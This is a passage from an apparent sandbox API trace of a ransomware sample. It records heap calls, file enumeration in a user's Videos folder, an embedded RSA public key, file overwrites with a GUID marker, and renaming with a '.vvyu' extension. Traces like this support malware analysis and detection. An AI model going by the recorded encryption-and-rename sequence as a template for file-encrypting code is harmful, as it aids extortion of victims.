hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bd70 | out: hHeap=0x6a0000) returned 1 [0190.609] GetCurrentThreadId () returned 0x264 [0190.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d447e0 [0190.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.610] GetCurrentThreadId () returned 0x264 [0190.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82d20 [0190.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0190.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bb0 [0190.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c10 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c28 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bc8 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b98 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30b98 | out: hHeap=0x6a0000) returned 1 [0190.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.621] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xd015, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xd015, lpOverlapped=0x0) returned 1 [0190.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.622] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd01a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.622] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0190.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0190.624] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.624] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.624] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.624] CloseHandle (hObject=0x584) returned 1 [0190.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0190.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.627] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\tKv_jmwrxLF8d6FC.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\tkv_jmwrxlf8d6fc.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\tKv_jmwrxLF8d6FC.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\tkv_jmwrxlf8d6fc.swf.vvyu")) returned 1 [0190.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.628] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0190.631] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec11f30, ftCreationTime.dwHighDateTime=0x1d8a151, ftLastAccessTime.dwLowDateTime=0xf725d80, ftLastAccessTime.dwHighDateTime=0x1d8a5d5, ftLastWriteTime.dwLowDateTime=0xf725d80, ftLastWriteTime.dwHighDateTime=0x1d8a5d5, nFileSizeHigh=0x0, nFileSizeLow=0x1067e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tosxRVQraIGf3MknOm0.avi", cAlternateFileName="TOSXRV~1.AVI")) returned 1 [0190.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.632] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\tosxRVQraIGf3MknOm0.avi") returned=".avi" [0190.632] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\tosxRVQraIGf3MknOm0.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\tosxrvqraigf3mknom0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.632] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=67198) returned 1 [0190.632] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.635] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10658, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.635] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.639] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.639] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1067e, lpOverlapped=0x0) returned 1 [0190.640] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.640] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.640] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.640] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0190.641] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.641] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.641] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.641] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.642] GetLastError () returned 0x0 [0190.642] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.642] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0190.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.642] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.642] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.642] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10680) returned 0x2d45778 [0190.643] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30b98 [0190.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30b50 [0190.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0190.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 